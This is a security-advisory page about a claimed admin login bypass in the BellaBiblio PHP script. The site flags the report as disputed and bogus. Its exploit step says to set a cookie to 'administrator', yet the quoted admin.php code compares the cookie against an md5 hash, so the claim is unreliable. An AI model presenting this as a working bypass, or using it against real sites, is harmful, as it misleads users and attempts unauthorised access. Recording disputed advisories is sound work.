WARNING! Fake news / Disputed / BOGUS

BellaBiblio Admin Login Bypass

2007.08.10
Credit: ilker kandemir
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-4230
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

BellaBiblio Admin Login Bypass SCRIPT: BellaBiblio DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com> Bug in;(admin.php) if (isset($_COOKIE['bellabiblio'])) { if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) { if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = ""; EXPLOIT: Set your cookie: bellabiblio=administrator http:/site.com/admin.php And you have full admin access

References:

http://www.securityfocus.com/bid/25140
http://www.securityfocus.com/archive/1/archive/1/475103/100/0/threaded
http://www.attrition.org/pipermail/vim/2007-July/001745.html
http://www.attrition.org/pipermail/vim/2007-July/001736.html
http://www.attrition.org/pipermail/vim/2007-July/001733.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top